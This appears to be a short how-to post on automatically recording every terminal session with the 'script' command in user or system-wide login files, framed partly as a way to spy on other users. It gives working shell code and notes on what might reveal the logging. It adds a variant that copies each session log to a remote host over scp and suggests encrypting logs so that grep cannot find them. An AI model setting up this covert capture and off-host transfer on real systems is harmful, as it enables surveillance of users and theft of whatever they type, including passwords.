Logging your BASH sessions can be useful to keep a log of what you have done on your computer or spy on other users. This is a basic example of how to use the script program and a login script to automatically create a separate log file for each terminal session.
Code
The code can be put into one of several different files. ~/.bash_profile would be for per user logging and /etc/profile or /etc/bash/bashrc can be used to log all users on the box. A destination directory will also need to be created with writable permission by the user who the logging is for.
# Only run if this is the first Shell.
# Script will launch another instance of BASH.
# BASH automatically increments this environment variable each time it is ran withing itself.
# This will prevent it from running in an infinite loop.
if [ $SHLVL -eq 1 ];
then
# Run the script command and drop down to the users shell.
# SHLVL will be incremented and will equal 2.
# -q(quiet) - Don't print anything to the screen.
# -f(file) - Save the log file to here.
# /tmp/ - The directory to save the logs. Needs write permission by the user being logged.
# ${USER} - Puts the username in the log file. Brackets are used so the underscore isn't interpreted as being part of the variable name.
# .log - A file extension. Doesn't really mean anything.
# `date +%Y%m%d_%H%M%S` - Run the date command and return YYYYMMDD_HHMMSS
script -q -f /tmp/${USER}_`date +%Y%m%d_%H%M%S`.log
# This will exit the first BASH session, preventing the user from having to type exit twice
exit
# End the if statement.
fi
Impact
- The user will notice an extra BASH session and the script program running if they were to list their processes.
Alternative Code
This can be used if the SHLVL variable isn’t set by BASH.
# Was: if [ $SHLVL -eq 1 ];
if [ ! $SCRIPT ];
then
# Was: script -q -f /tmp/${USER}_`date +%Y%m%d_%H%M%S`.log
SCRIPT=yes script -q -f /tmp/${USER}_`date +%Y%m%d_%H%M%S`.log
exit
# End the if statement.
fi
Impact
- Same as the previous code along with an extra variable in their environment. The env command will reveal it.
Another Idea
This could be taken one step further to do other things with the log file. The name of the file could be stored as a variable before the script command is ran to preserver the name and then it could be used to Secure Copy it to a remote box. This assumes the keys are set up for SSH in the users ~/.ssh/ directory so a password is not required to log into the remote box.
if [ $SHLVL -eq 1 ];
then
FILE=/tmp/${USER}_`date +%Y%m%d_%H%M%S`.log
script -q -f $FILE
scp $FILE remoteuser@remotehost:/path/to/logs/
exit
fi
Impact
- This will include the same impacts as the original code as well as an outgoing connection to a remote box.
- The addition of the remote host’s public key in the /etc/ssh/ssh_known_hosts file or the users ~/.ssh/known_hosts file.
- The addition of the remote remote user’s public key in the users ~/.ssh/authorized_keys file.
Conclusion
The possibilities are endless. The log file could be compressed or even encrypted some how. This would help prevent simple utilities, such as grep, from finding content in the files.